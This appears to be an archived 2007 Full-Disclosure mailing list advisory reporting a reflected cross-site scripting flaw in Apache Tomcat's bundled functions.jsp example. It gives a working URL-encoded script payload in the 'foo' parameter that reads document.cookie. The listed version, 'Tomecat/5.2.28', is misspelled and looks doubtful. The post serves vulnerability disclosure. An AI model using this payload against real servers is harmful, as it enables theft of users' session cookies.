[<prev] [next>] [day] [month] [year] [list]
Message-ID: <f6d1ddc30709051916t7bd894e2if374b4f638368335@mail.gmail.com>
Date: Thu, 6 Sep 2007 02:16:15 +0000
From: "handrix cobra" <handrix@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: simo@...x.org
Subject: Apache Tomcat remote xss
Apache Tomcat remote xss
Author: handrix
Contact: handrix_at_morx_dot_org
Vulnerability: Cross Site Scripting
Severity: Medium/High
MorX security research team
www.morx.org
Description:
Tomcat provide many example of jsp file, servlet and others.
functions.jsp script is vulnerable to cross-site scripting attacks in foo
parameter.
XSS Vector:
http://server:port/jsp-examples/jsp2/el/functions.jsp?foo=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
Vulnerable versions :
Apache Tomecat/5.2.28 and may be others
Content of type "text/html" skipped
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists